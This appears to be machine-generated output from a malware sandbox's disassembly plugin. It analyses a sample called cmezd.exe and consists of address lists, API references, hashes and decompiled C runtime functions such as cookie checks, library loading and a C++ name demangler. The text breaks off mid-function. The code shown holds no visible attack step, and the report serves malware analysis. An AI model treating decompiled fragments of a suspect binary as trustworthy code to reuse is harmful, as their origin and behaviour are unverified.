                                                                                              0x0135469a
                                                                                              0x013546a1
                                                                                              0x013546fd
                                                                                              0x01354700
                                                                                              0x01354708
                                                                                              0x0135470f
                                                                                              0x00000000
                                                                                              0x0135470f
                                                                                              0x00000000
                                                                                              0x013546a3
                                                                                              0x013546a3
                                                                                              0x013546a9
                                                                                              0x013546af
                                                                                              0x013546b5
                                                                                              0x01354720
                                                                                              0x01354729
                                                                                              0x013546b7
                                                                                              0x013546b7
                                                                                              0x013546b7
                                                                                              0x013546bd
                                                                                              0x013546c0
                                                                                              0x013546c3
                                                                                              0x013546c6
                                                                                              0x013546c9
                                                                                              0x013546ce
                                                                                              0x013546e4
                                                                                              0x00000000
                                                                                              0x013546d0
                                                                                              0x013546d0
                                                                                              0x013546d2
                                                                                              0x013546d7
                                                                                              0x013546d9
                                                                                              0x013546dc
                                                                                              0x013546de
                                                                                              0x013546f4
                                                                                              0x01354714
                                                                                              0x01354714
                                                                                              0x01354718
                                                                                              0x00000000
                                                                                              0x013546e0
                                                                                              0x013546e0
                                                                                              0x0135472a
                                                                                              0x0135472d
                                                                                              0x01354733
                                                                                              0x01354735
                                                                                              0x0135473c
                                                                                              0x01354743
                                                                                              0x01354748
                                                                                              0x0135474b
                                                                                              0x0135474d
                                                                                              0x0135474f
                                                                                              0x0135475c
                                                                                              0x01354762
                                                                                              0x01354764
                                                                                              0x01354767
                                                                                              0x01354767
                                                                                              0x0135476a
                                                                                              0x0135476a
                                                                                              0x0135473c
                                                                                              0x01354770
                                                                                              0x01354772
                                                                                              0x01354777
                                                                                              0x0135477a
                                                                                              0x0135477d
                                                                                              0x01354785
                                                                                              0x01354789
                                                                                              0x0135478e
                                                                                              0x0135478e
                                                                                              0x01354791
                                                                                              0x01354795
                                                                                              0x01354798
                                                                                              0x013547a8
                                                                                              0x013547ad
                                                                                              0x013547ae
                                                                                              0x013547af
                                                                                              0x013547b0
                                                                                              0x013547b1
                                                                                              0x013547b2
                                                                                              0x013547b6
                                                                                              0x013547ba
                                                                                              0x013547c2
                                                                                              0x013547c4
                                                                                              0x013547c6
                                                                                              0x013547d0
                                                                                              0x013547d0
                                                                                              0x013547d3
                                                                                              0x01354cab
                                                                                              0x01354cab
                                                                                              0x01354cab
                                                                                              0x01354cae
                                                                                              0x01354cb0
                                                                                              0x01354cb2
                                                                                              0x01354cb2
                                                                                              0x01354cb5
                                                                                              0x01354cb9
                                                                                              0x01354cbb
                                                                                              0x01354cbe
                                                                                              0x01354cc1
                                                                                              0x01354cc1
                                                                                              0x01354cc1
                                                                                              0x01354cc8
                                                                                              0x01354cc8
                                                                                              0x01354ccb
                                                                                              0x01354ccf
                                                                                              0x01354cd1
                                                                                              0x01354cd2
                                                                                              0x01354cd3
                                                                                              0x01354cd3
                                                                                              0x01354cd3
                                                                                              0x01354ccb
                                                                                              0x00000000
                                                                                              0x013547d9
                                                                                              0x013547d9
                                                                                              0x013547df
                                                                                              0x013547f4
                                                                                              0x013547fc
                                                                                              0x0135480b
                                                                                              0x01354810
                                                                                              0x01354820
                                                                                              0x01354820
                                                                                              0x01354828
                                                                                              0x00000000
                                                                                              0x0135482e
                                                                                              0x0135482e
                                                                                              0x01354834
                                                                                              0x00000000
                                                                                              0x0135483a
                                                                                              0x0135483a
                                                                                              0x01354840
                                                                                              0x01354846
                                                                                              0x0135484a
                                                                                              0x0135484c
                                                                                              0x0135484e
                                                                                              0x0135484e
                                                                                              0x01354851
                                                                                              0x01354851
                                                                                              0x01354854
                                                                                              0x01354856
                                                                                              0x01354856
                                                                                              0x01354859
                                                                                              0x0135485d
                                                                                              0x0135485f
                                                                                              0x01354863
                                                                                              0x01354863
                                                                                              0x01354866
                                                                                              0x01354866
                                                                                              0x01354869
                                                                                              0x0135486d
                                                                                              0x0135486d
                                                                                              0x01354870
                                                                                              0x01354876
                                                                                              0x013548dd
                                                                                              0x013548e2
                                                                                              0x013548e2
                                                                                              0x013548e8
                                                                                              0x013548e8
                                                                                              0x013548ed
                                                                                              0x013548f0
                                                                                              0x013548f5
                                                                                              0x013548fa
                                                                                              0x013548fd
                                                                                              0x01354900
                                                                                              0x01354904
                                                                                              0x0135490a
                                                                                              0x0135490e
                                                                                              0x01354912
                                                                                              0x01354918
                                                                                              0x0135491d
                                                                                              0x01354921
                                                                                              0x01354927
                                                                                              0x0135492c
                                                                                              0x0135492c
                                                                                              0x01354931
                                                                                              0x01354878
                                                                                              0x01354878
                                                                                              0x0135487c
                                                                                              0x01354936
                                                                                              0x0135493b
                                                                                              0x0135493b
                                                                                              0x01354940
                                                                                              0x01354940
                                                                                              0x01354945
                                                                                              0x01354948
                                                                                              0x0135494d
                                                                                              0x01354952
                                                                                              0x01354955
                                                                                              0x01354958
                                                                                              0x0135495c
                                                                                              0x01354962
                                                                                              0x01354966
                                                                                              0x0135496a
                                                                                              0x01354970
                                                                                              0x01354975
                                                                                              0x01354979
                                                                                              0x0135497f
                                                                                              0x01354984
                                                                                              0x01354984
                                                                                              0x01354989
                                                                                              0x0135498c
                                                                                              0x0135498c
                                                                                              0x0135498c
                                                                                              0x0135498f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01354991
                                                                                              0x01354995
                                                                                              0x01354998
                                                                                              0x0135499b
                                                                                              0x0135499f
                                                                                              0x0135499f
                                                                                              0x013549a4
                                                                                              0x013549a8
                                                                                              0x013549aa
                                                                                              0x013549ac
                                                                                              0x013549ac
                                                                                              0x013549af
                                                                                              0x013549b2
                                                                                              0x013549b4
                                                                                              0x013549b4
                                                                                              0x013549b7
                                                                                              0x013549bb
                                                                                              0x013549bd
                                                                                              0x013549c1
                                                                                              0x013549c4
                                                                                              0x013549c7
                                                                                              0x013549cb
                                                                                              0x013549cb
                                                                                              0x013549d5
                                                                                              0x013549d5
                                                                                              0x01354882
                                                                                              0x01354887
                                                                                              0x01354887
                                                                                              0x0135488c
                                                                                              0x0135488c
                                                                                              0x01354891
                                                                                              0x01354894
                                                                                              0x01354899
                                                                                              0x0135489e
                                                                                              0x013548a1
                                                                                              0x013548a4
                                                                                              0x013548a8
                                                                                              0x013548ae
                                                                                              0x013548b2
                                                                                              0x013548b6
                                                                                              0x013548bc
                                                                                              0x013548c1
                                                                                              0x013548c5
                                                                                              0x013548cb
                                                                                              0x013548d0
                                                                                              0x013548d0
                                                                                              0x013548d5
                                                                                              0x013548d5
                                                                                              0x00000000
                                                                                              0x01354876
                                                                                              0x01354840
                                                                                              0x01354834
                                                                                              0x00000000
                                                                                              0x01354812
                                                                                              0x01354812
                                                                                              0x0135481a
                                                                                              0x01354c02
                                                                                              0x01354c05
                                                                                              0x01354c07
                                                                                              0x01354cf9
                                                                                              0x01354cfa
                                                                                              0x01354cfe
                                                                                              0x01354cfe
                                                                                              0x01354d01
                                                                                              0x01354d05
                                                                                              0x01354d07
                                                                                              0x01354d08
                                                                                              0x01354d09
                                                                                              0x01354d09
                                                                                              0x01354d09
                                                                                              0x01354d0c
                                                                                              0x01354d0c
                                                                                              0x01354d0f
                                                                                              0x01354d13
                                                                                              0x01354d15
                                                                                              0x01354d15
                                                                                              0x01354d18
                                                                                              0x01354d1b
                                                                                              0x01354d1b
                                                                                              0x01354d1b
                                                                                              0x01354d1e
                                                                                              0x01354d1e
                                                                                              0x01354c0d
                                                                                              0x01354c0f
                                                                                              0x01354c12
                                                                                              0x01354c12
                                                                                              0x01354c15
                                                                                              0x01354c20
                                                                                              0x01354c24
                                                                                              0x01354c29
                                                                                              0x01354c2e
                                                                                              0x01354c33
                                                                                              0x01354c37
                                                                                              0x01354c3c
                                                                                              0x01354c41
                                                                                              0x01354c46
                                                                                              0x01354c4b
                                                                                              0x01354c50
                                                                                              0x01354c55
                                                                                              0x01354c5a
                                                                                              0x01354c5f
                                                                                              0x01354c64
                                                                                              0x01354c69
                                                                                              0x01354c6e
                                                                                              0x01354c6e
                                                                                              0x01354c74
                                                                                              0x01354c7a
                                                                                              0x01354c7a
                                                                                              0x01354c7a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135481a
                                                                                              0x013547fe
                                                                                              0x013547fe
                                                                                              0x01354806
                                                                                              0x01354806
                                                                                              0x013547e1
                                                                                              0x013547e1
                                                                                              0x013547e9
                                                                                              0x01354c7d
                                                                                              0x01354c7d
                                                                                              0x01354c7f
                                                                                              0x01354c83
                                                                                              0x01354c86
                                                                                              0x01354c88
                                                                                              0x01354c90
                                                                                              0x01354c90
                                                                                              0x01354c94
                                                                                              0x01354c99
                                                                                              0x01354c9d
                                                                                              0x01354ca2
                                                                                              0x01354ca2
                                                                                              0x01354ca5
                                                                                              0x01354ca8
                                                                                              0x01354ca8
                                                                                              0x01354ca8
                                                                                              0x01354c90
                                                                                              0x00000000
                                                                                              0x01354c88
                                                                                              0x01354ce0
                                                                                              0x01354ce6
                                                                                              0x013547ef
                                                                                              0x013549d7
                                                                                              0x013549d7
                                                                                              0x013549dd
                                                                                              0x013549e1
                                                                                              0x013549e3
                                                                                              0x013549e4
                                                                                              0x013549e7
                                                                                              0x013549ea
                                                                                              0x013549ea
                                                                                              0x013549f2
                                                                                              0x013549f2
                                                                                              0x013549f4
                                                                                              0x013549f7
                                                                                              0x00000000
                                                                                              0x013549fd
                                                                                              0x01354a00
                                                                                              0x01354a05
                                                                                              0x00000000
                                                                                              0x01354a2a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01354a2e
                                                                                              0x01354a30
                                                                                              0x01354a34
                                                                                              0x01354a35
                                                                                              0x01354a36
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01354a3a
                                                                                              0x01354a3c
                                                                                              0x01354a3f
                                                                                              0x01354a42
                                                                                              0x01354a46
                                                                                              0x01354a47
                                                                                              0x01354a48
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01354a4e
                                                                                              0x01354a50
                                                                                              0x01354a53
                                                                                              0x01354a56
                                                                                              0x01354a59
                                                                                              0x01354a5c
                                                                                              0x01354a60
                                                                                              0x01354a61
                                                                                              0x01354a62
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01354a05
                                                                                              0x013549f7
                                                                                              0x013547e9
                                                                                              0x013547df
                                                                                              0x013547c8
                                                                                              0x013547c8
                                                                                              0x013547ca
                                                                                              0x01354a64
                                                                                              0x01354a67
                                                                                              0x01354a6a
                                                                                              0x01354a6d
                                                                                              0x01354bc4
                                                                                              0x01354bc4
                                                                                              0x01354bca
                                                                                              0x01354bcc
                                                                                              0x01354bcf
                                                                                              0x01354bd4
                                                                                              0x01354bd6
                                                                                              0x01354bd9
                                                                                              0x01354bd9
                                                                                              0x01354be1
                                                                                              0x01354be3
                                                                                              0x01354be5
                                                                                              0x01354be5
                                                                                              0x01354be8
                                                                                              0x01354bed
                                                                                              0x01354bef
                                                                                              0x01354bef
                                                                                              0x01354bef
                                                                                              0x01354be5
                                                                                              0x01354bfa
                                                                                              0x01354a73
                                                                                              0x01354a73
                                                                                              0x01354a7b
                                                                                              0x01354b15
                                                                                              0x01354b1b
                                                                                              0x01354b1d
                                                                                              0x01354b1d
                                                                                              0x01354b1e
                                                                                              0x01354b1f
                                                                                              0x01354b22
                                                                                              0x01354b24
                                                                                              0x01354b24
                                                                                              0x01354b2c
                                                                                              0x01354b2c
                                                                                              0x01354b2c
                                                                                              0x01354b32
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01354b34
                                                                                              0x01354b3a
                                                                                              0x01354b40
                                                                                              0x01354b44
                                                                                              0x01354b49
                                                                                              0x01354b4e
                                                                                              0x01354b53
                                                                                              0x01354b58
                                                                                              0x01354b5d
                                                                                              0x01354b62
                                                                                              0x01354b67
                                                                                              0x01354b6b
                                                                                              0x01354b70
                                                                                              0x01354b75
                                                                                              0x01354b7a
                                                                                              0x01354b7f
                                                                                              0x01354b84
                                                                                              0x01354b89
                                                                                              0x01354b8e
                                                                                              0x01354b94
                                                                                              0x01354b9a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01354b9a
                                                                                              0x01354b9c
                                                                                              0x01354b9f
                                                                                              0x01354ba1
                                                                                              0x01354ba1
                                                                                              0x01354ba4
                                                                                              0x01354ba7
                                                                                              0x01354bab
                                                                                              0x01354bb0
                                                                                              0x01354bb4
                                                                                              0x01354bb9
                                                                                              0x01354bbc
                                                                                              0x01354bbc
                                                                                              0x01354ba1
                                                                                              0x00000000
                                                                                              0x01354b9f
                                                                                              0x00000000
                                                                                              0x01354a81
                                                                                              0x01354a81
                                                                                              0x01354a87
                                                                                              0x01354a8b
                                                                                              0x01354a8e
                                                                                              0x01354a8e
                                                                                              0x01354a90
                                                                                              0x01354a90
                                                                                              0x01354a93
                                                                                              0x01354a96
                                                                                              0x01354a97
                                                                                              0x01354a98
                                                                                              0x01354a98
                                                                                              0x01354a98
                                                                                              0x01354a90
                                                                                              0x01354a9d
                                                                                              0x01354aa0
                                                                                              0x00000000
                                                                                              0x01354aa6
                                                                                              0x01354ab4
                                                                                              0x01354ab5
                                                                                              0x01354ab7
                                                                                              0x01354ab8
                                                                                              0x00000000
                                                                                              0x01354ad6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01354adb
                                                                                              0x01354ade
                                                                                              0x01354ae2
                                                                                              0x01354ae3
                                                                                              0x01354ae4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01354ae8
                                                                                              0x01354aeb
                                                                                              0x01354aee
                                                                                              0x01354af1
                                                                                              0x01354af4
                                                                                              0x01354af8
                                                                                              0x01354af9
                                                                                              0x01354afa
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01354afc
                                                                                              0x01354aff
                                                                                              0x01354b02
                                                                                              0x01354b05
                                                                                              0x01354b08
                                                                                              0x01354b0b
                                                                                              0x01354b0e
                                                                                              0x01354b12
                                                                                              0x01354b13
                                                                                              0x01354b14
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01354ab8
                                                                                              0x01354aa0
                                                                                              0x01354a7b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013547ca
                                                                                              0x013546e2
                                                                                              0x00000000
                                                                                              0x013546e2
                                                                                              0x013546e0
                                                                                              0x013546de
                                                                                              0x00000000
                                                                                              0x013546e7
                                                                                              0x013546e7
                                                                                              0x013546e9
                                                                                              0x013546f0
                                                                                              0x00000000
                                                                                              0x013546f2
                                                                                              0x00000000
                                                                                              0x013546f0
                                                                                              0x013546b5
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 01354687
                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 0135468F
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 01354718
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 01354798
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: CookiesLocalValidate$___except_validate_context_record
                                                                                              • String ID: csm
                                                                                              • API String ID: 2101322661-1018135373
                                                                                              • Opcode ID: 9024d2891c3459c6a77b674381b67589e5d4f15e33d48be27b1eeb401afc9d19
                                                                                              • Instruction ID: d2093eab2ae2b4d1d80426d1e949f12d07c83ee94eda0d4d203557223fc9be15
                                                                                              • Opcode Fuzzy Hash: 9024d2891c3459c6a77b674381b67589e5d4f15e33d48be27b1eeb401afc9d19
                                                                                              • Instruction Fuzzy Hash: 2D41BE34A00209EBCF14DF6CC880E9EBBA9AF45728F148095ED159B355E731EA91CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0136DED3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0136DED3(intOrPtr* _a4, intOrPtr _a8, void* _a12, intOrPtr _a16) {
				void* _t15;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					if( *_t40 != 0) {
						_t15 = E0136F1C0(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						if(_t15 != 0) {
							_t38 = _a8;
							if(_t15 <=  *((intOrPtr*)(_t38 + 0xc))) {
								L10:
								_t16 = E0136D54E(_a16, _t40,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)));
								if(_t16 != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t16 - 1;
									_t18 = 0;
								} else {
									E0136777A(GetLastError());
									_t18 =  *((intOrPtr*)(E013676C8()));
								}
								L13:
								L14:
								return _t18;
							}
							_t18 = E0136DE7B(_t38, _t15);
							if(_t18 != 0) {
								goto L13;
							}
							goto L10;
						}
						E0136777A(GetLastError());
						_t18 =  *((intOrPtr*)(E013676C8()));
						goto L14;
					}
					_t41 = _a8;
					if( *((intOrPtr*)(_t41 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = 0;
						_t18 = 0;
						 *((intOrPtr*)(_t41 + 0x10)) = 0;
						goto L14;
					}
					_t18 = E0136DE7B(_t41, 1);
					if(_t18 != 0) {
						goto L14;
					}
					goto L5;
				}
				E0136DEA2(_a8);
				return 0;
			}









                                                                                              0x0136ded9
                                                                                              0x0136dede
                                                                                              0x0136def5
                                                                                              0x0136df27
                                                                                              0x0136df31
                                                                                              0x0136df4a
                                                                                              0x0136df50
                                                                                              0x0136df5e
                                                                                              0x0136df6b
                                                                                              0x0136df72
                                                                                              0x0136df8b
                                                                                              0x0136df8e
                                                                                              0x0136df74
                                                                                              0x0136df7b
                                                                                              0x0136df86
                                                                                              0x0136df86
                                                                                              0x0136df90
                                                                                              0x0136df91
                                                                                              0x00000000
                                                                                              0x0136df91
                                                                                              0x0136df55
                                                                                              0x0136df5c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0136df5c
                                                                                              0x0136df3a
                                                                                              0x0136df45
                                                                                              0x00000000
                                                                                              0x0136df45
                                                                                              0x0136def7
                                                                                              0x0136defd
                                                                                              0x0136df10
                                                                                              0x0136df13
                                                                                              0x0136df15
                                                                                              0x0136df17
                                                                                              0x00000000
                                                                                              0x0136df17
                                                                                              0x0136df03
                                                                                              0x0136df0a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0136df0a
                                                                                              0x0136dee3
                                                                                              0x00000000

                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Local\Temp\cmezd.exe, xrefs: 0136DEEF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\cmezd.exe
                                                                                              • API String ID: 0-3923293173
                                                                                              • Opcode ID: 9b8b818db640f053ea510de4d168223c123c59d5964599ec0df38db332e285e7
                                                                                              • Instruction ID: f287bd0ab8f12939316db05dabd4044168a697ae48fa3e1d88058d64417710c3
                                                                                              • Opcode Fuzzy Hash: 9b8b818db640f053ea510de4d168223c123c59d5964599ec0df38db332e285e7
                                                                                              • Instruction Fuzzy Hash: F721C07170420AAFDB21AFF9DC8096AB7ADEF5136C700C524F899DB158E731EC1487A0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 013551FB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 25%
                                                                                              			E013551FB(intOrPtr _a4) {
				char _v16;
				signed int _v20;
				signed int _t11;
				int _t14;
				void* _t16;
				void* _t20;
				int _t22;
				signed int _t23;

				_t11 =  *0x139e210; // 0x1911783b
				 *[fs:0x0] =  &_v16;
				_v20 = _v20 & 0x00000000;
				_t14 =  &_v20;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t14, _t11 ^ _t23, _t20, _t16,  *[fs:0x0], 0x13935ed, 0xffffffff);
				if(_t14 != 0) {
					_t14 = GetProcAddress(_v20, "CorExitProcess");
					_t22 = _t14;
					if(_t22 != 0) {
						 *0x13a2000(_a4);
						_t14 =  *_t22();
					}
				}
				if(_v20 != 0) {
					_t14 = FreeLibrary(_v20);
				}
				 *[fs:0x0] = _v16;
				return _t14;
			}











                                                                                              0x01355210
                                                                                              0x0135521b
                                                                                              0x01355221
                                                                                              0x01355225
                                                                                              0x01355230
                                                                                              0x01355238
                                                                                              0x01355242
                                                                                              0x01355248
                                                                                              0x0135524c
                                                                                              0x01355253
                                                                                              0x01355259
                                                                                              0x01355259
                                                                                              0x0135524c
                                                                                              0x0135525f
                                                                                              0x01355264
                                                                                              0x01355264
                                                                                              0x0135526d
                                                                                              0x01355277

                                                                                              APIs
                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,1911783B,?,?,00000000,013935ED,000000FF,?,013552FF,?,?,013553AE,?), ref: 01355230
                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 01355242
                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000000,013935ED,000000FF,?,013552FF,?,?,013553AE,?), ref: 01355264
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                              • API String ID: 4061214504-1276376045
                                                                                              • Opcode ID: f6185f9c639fea3d29f62230d40e914bf65844a9be1b6e630e6f5692eff28be1
                                                                                              • Instruction ID: 82c5fab5271b63774c656bcea64db915450bc148e63ee9050c341f301fb90311
                                                                                              • Opcode Fuzzy Hash: f6185f9c639fea3d29f62230d40e914bf65844a9be1b6e630e6f5692eff28be1
                                                                                              • Instruction Fuzzy Hash: 9A01A231954619EFDB218F54DC45FAEBBBCFB44B54F004629F812E2280DB799A00CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01362F11 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E01362F11(WCHAR* _a4) {
				struct HINSTANCE__* _t5;

				_t5 = LoadLibraryExW(_a4, 0, 0x800);
				if(_t5 != 0) {
					return _t5;
				} else {
					if(GetLastError() != 0x57 || E01368845(_a4, L"api-ms-", 7) == 0 || E01368845(_a4, L"ext-ms-", 7) == 0) {
						return 0;
					}
					return LoadLibraryExW(_a4, 0, 0);
				}
			}




                                                                                              0x01362f20
                                                                                              0x01362f28
                                                                                              0x01362f73
                                                                                              0x01362f2a
                                                                                              0x01362f33
                                                                                              0x00000000
                                                                                              0x01362f70
                                                                                              0x01362f6f
                                                                                              0x01362f6f

                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000800), ref: 01362F20
                                                                                              • GetLastError.KERNEL32 ref: 01362F2A
                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 01362F68
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                              • String ID: api-ms-$ext-ms-
                                                                                              • API String ID: 3177248105-537541572
                                                                                              • Opcode ID: f7dc01be61db7a753c897d6eb35807e2da592bbab35fc164dc858c5c74ed9b12
                                                                                              • Instruction ID: 350493f998bdabcf57858d7d3d762af4257e68746c9928596c63ccf4145f3529
                                                                                              • Opcode Fuzzy Hash: f7dc01be61db7a753c897d6eb35807e2da592bbab35fc164dc858c5c74ed9b12
                                                                                              • Instruction Fuzzy Hash: 79F01231784305B7EF211A65FC4AF6D3E5D9F00B58F158024F90CA80DDD7A3F5558655
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0135F545 Relevance: 7.7, APIs: 5, Instructions: 178COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 75%
                                                                                              			E0135F545(void* __ebx, signed int* _a4, signed int* _a8) {
				signed int _v8;
				char _v12;
				signed int _v16;
				char* _v20;
				void* __esi;
				char _t58;
				void* _t61;
				signed int _t62;
				signed int _t63;
				signed int _t64;
				signed int _t67;
				intOrPtr* _t69;
				signed int _t75;
				intOrPtr* _t77;
				signed int _t89;
				signed int _t90;
				signed int _t93;
				signed int _t96;
				void* _t103;
				char* _t109;
				char* _t115;
				char* _t118;
				intOrPtr* _t120;
				signed int* _t121;

				_t108 = __ebx;
				_t109 =  *0x13a0b18; // 0x0
				_v12 = 0;
				_v8 = 0;
				_t58 =  *_t109;
				if(_t58 == 0) {
					L15:
					E0135BE7A(_t109, _a4, 1, _a8);
					L16:
					L17:
					return _a4;
				}
				_t61 = _t58 - 0x24;
				if(_t61 == 0) {
					_t62 =  *((intOrPtr*)(_t109 + 1));
					__eflags = _t62 - 0x24;
					if(_t62 == 0x24) {
						_t109 = _t109 + 2;
						 *0x13a0b18 = _t109;
						_t63 =  *_t109;
						__eflags = _t63 - 0x52;
						if(__eflags > 0) {
							_t64 = _t63 - 0x53;
							__eflags = _t64;
							if(_t64 == 0) {
								_t56 = _t109 + 1; // -1
								 *0x13a0b18 = _t56;
								L39:
								E0135B826(_a4, 2);
								goto L17;
							}
							_t67 = _t64 - 1;
							__eflags = _t67;
							if(_t67 == 0) {
								_t46 = _t109 + 1; // -1
								 *0x13a0b18 = _t46;
								_t69 = _a8;
								__eflags =  *_t69;
								if( *_t69 == 0) {
									_v20 = "std::nullptr_t";
									_v16 = 0xe;
									E0135B77F(_a4,  &_v20);
									goto L17;
								}
								_v20 = "std::nullptr_t ";
								_v16 = 0xf;
								E0135BE2D(_t109, _a4,  &_v20, _t69);
								goto L16;
							}
							_t75 = _t67;
							__eflags = _t75;
							if(_t75 == 0) {
								_t120 = _a8;
								_t42 = _t109 + 1; // -1
								 *0x13a0b18 = _t42;
								_t77 = _a4;
								 *_t77 =  *_t120;
								 *((intOrPtr*)(_t77 + 4)) =  *((intOrPtr*)(_t120 + 4));
								return _t77;
							}
							__eflags = _t75 - 3;
							if(__eflags == 0) {
								_t40 = _t109 + 1; // -1
								 *0x13a0b18 = _t40;
								E0135D0ED(0, __eflags, _a4);
								L6:
								goto L17;
							}
							goto L39;
						}
						_t121 = _a8;
						if(__eflags == 0) {
							_t115 =  &_v12;
							_push( &_v20);
							__eflags =  *_t121;
							if( *_t121 == 0) {
								_v20 = "volatile";
								_v16 = 8;
							} else {
								_v20 = "volatile ";
								_v16 = 9;
							}
